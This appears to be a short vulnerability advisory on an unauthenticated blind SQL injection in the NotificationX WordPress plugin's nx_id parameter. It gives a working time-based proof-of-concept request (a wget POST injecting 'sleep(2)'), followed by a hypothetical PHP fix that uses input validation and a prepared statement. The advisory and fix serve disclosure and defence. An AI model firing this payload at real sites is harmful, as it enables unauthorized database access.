The plugin does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection.
time wget 'https://example.com/?rest_route=/notificationx/v1/analytics' --post-data="nx_id=sleep(2) -- x" -q -O-
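
The fix pattern for this class of bug, as an added example that is not the plugin's own code: a WordPress REST route that rejects a non-integer nx_id before the callback runs and binds the value through a prepared statement. The handler name, table name and column names are hypothetical; only the route and the nx_id parameter come from the advisory.

```php
<?php
// Added example: hypothetical handler, not NotificationX's actual code.
// Assumed names: nx_example_record_view, table nx_example_stats, column views.

add_action( 'rest_api_init', function () {
    register_rest_route( 'notificationx/v1', '/analytics', array(
        'methods'             => 'POST',
        'callback'            => 'nx_example_record_view',
        // The endpoint is public, so input validation is the only gate.
        'permission_callback' => '__return_true',
        'args'                => array(
            'nx_id' => array(
                'required'          => true,
                // Layer 1: accept only a plain positive integer. A value such
                // as "sleep(2) -- x" is rejected with HTTP 400 before the
                // callback (and the database) is ever reached.
                'validate_callback' => function ( $value ) {
                    return is_scalar( $value )
                        && 1 === preg_match( '/^[1-9][0-9]*$/', (string) $value );
                },
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );

function nx_example_record_view( WP_REST_Request $request ) {
    global $wpdb;

    // Defence in depth: cast again even though the route schema validated it.
    $nx_id = absint( $request->get_param( 'nx_id' ) );
    $table = $wpdb->prefix . 'nx_example_stats'; // hypothetical table

    // Layer 2: the value is bound through a %d placeholder, never
    // concatenated into the SQL string.
    $updated = $wpdb->query(
        $wpdb->prepare(
            "UPDATE {$table} SET views = views + 1 WHERE nx_id = %d",
            $nx_id
        )
    );

    if ( false === $updated ) {
        return new WP_Error( 'nx_example_db_error', 'Could not record view.', array( 'status' => 500 ) );
    }
    return rest_ensure_response( array( 'updated' => (int) $updated ) );
}
```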